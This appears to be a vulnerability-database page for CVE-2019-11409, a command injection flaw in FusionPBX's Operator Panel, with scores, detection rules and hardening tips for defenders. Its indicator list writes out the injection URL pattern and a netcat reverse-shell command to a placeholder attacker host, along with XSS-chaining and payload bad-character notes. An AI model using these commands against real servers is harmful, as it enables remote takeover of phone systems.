cbcvebase.
CVE-2019-11409
published 2019-06-17

CVE-2019-11409: app/operator_panel/exec.php in the Operator Panel module in FusionPBX 4.4.3 suffers from a command injection vulnerability due to a lack of input validation…

PriorityP275high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
87.48%
99.7th percentile
app/operator_panel/exec.php in the Operator Panel module in FusionPBX 4.4.3 suffers from a command injection vulnerability due to a lack of input validation that allows authenticated non-administrative attackers to execute commands on the host. This can further lead to remote code execution when combined with an XSS vulnerability also present in the FusionPBX Operator Panel module.

Affected

1 ranges
VendorProductVersion rangeFixed in
fusionpbxfusionpbx

Detection & IOCsextracted from sources · hover to see the quote

pathapp/operator_panel/exec.php
url/app/operator_panel/exec.php?cmd=bg_system+<cmd>
commandbg_system <cmd>
commandsystem <cmd>
commandnc -e /bin/bash <attacker_ip> <attacker_port>
port5080
  • Detect GET requests to /app/operator_panel/exec.php with a 'cmd' parameter containing 'bg_system' or 'system' — these are the FreeSWITCH event socket commands used to achieve command injection.
  • Alert on HTTP responses from exec.php containing the string 'access denied' as a negative indicator; absence of this string with a 200 response confirms successful exploitation.
  • Detect XMLHttpRequest calls originating from the operator panel page to exec.php with a 'cmd' parameter — this is the XSS-to-RCE pivot pattern.
  • Flag POST requests to /core/user_settings/user_dashboard.php followed immediately by GET requests to /app/operator_panel/exec.php from the same session — this is the login-then-exploit sequence used by the Metasploit module.
  • The exploit requires operator_panel_view or administrator permissions; audit FusionPBX user accounts with these roles as a hardening measure.
  • ·Exploitation requires authentication; the attacker must have valid credentials with at least 'operator_panel_view' permissions. Unauthenticated exploitation is only possible when chained with the XSS (CVE-2019-11408) to steal a session cookie.
  • ·The Metasploit module defaults to SSL on port 443; detections should cover both HTTP and HTTPS traffic to the target paths.
  • ·The standalone PoC exploit (EDB-46985) chains CVE-2019-11408 (XSS) with CVE-2019-11409 (command injection) and does not require prior authentication — it injects the XSS via a SIP INVITE on port 5080 to steal operator session and then calls exec.php.
  • ·Bad characters in payloads are null byte, newline, carriage return, single quote, and backslash — payload encoding must account for these when crafting custom detections.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.